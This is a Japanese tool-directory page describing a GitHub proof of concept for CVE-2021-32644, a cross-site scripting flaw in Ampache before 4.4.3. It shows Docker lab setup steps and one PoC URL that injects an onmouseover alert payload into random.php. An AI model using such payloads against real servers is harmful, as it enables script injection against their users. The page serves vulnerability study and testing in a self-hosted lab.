Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-32644 — Ampache XSS | Kitploit
ツール/GitHubGitHub/dnr6419/cve-2021-32644
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubdnr6419/cve-2021-32644

CVE-2021-32644

Ampache XSS

リポジトリを見る
4年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-32644

この脆弱性はAmpache 4.4.3より前のバージョンに影響を与えたXSS脆弱性です。 https://nvd.nist.gov/vuln/detail/CVE-2021-32644

インストールと実行手順

1. Ampacheのインストール

インストールを進める際は、docker-compose.ymlファイルでポートフォワーディングを行ってください。現在インストールするAmpacheのバージョンは4.4.2です。

root@kitploit:~
 $docker-compose up  

2. Amapacheへのアクセス

http://[web-server ip]:port/に移動します。

2. Amapacheへのアクセス & mysql設定

http://[web-server ip]:port/に移動します。 下の画像のようにmysql DBを設定します。 image

3. PoC

以下のPoCを挿入すると、XSS脆弱性が発生することが確認できます。

root@kitploit:~
 http://[ip]:port/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20

image

出典

https://packetstormsecurity.com/files/163620/Ampache-4.4.2-Cross-Site-Scripting.html

ツールをダウンロード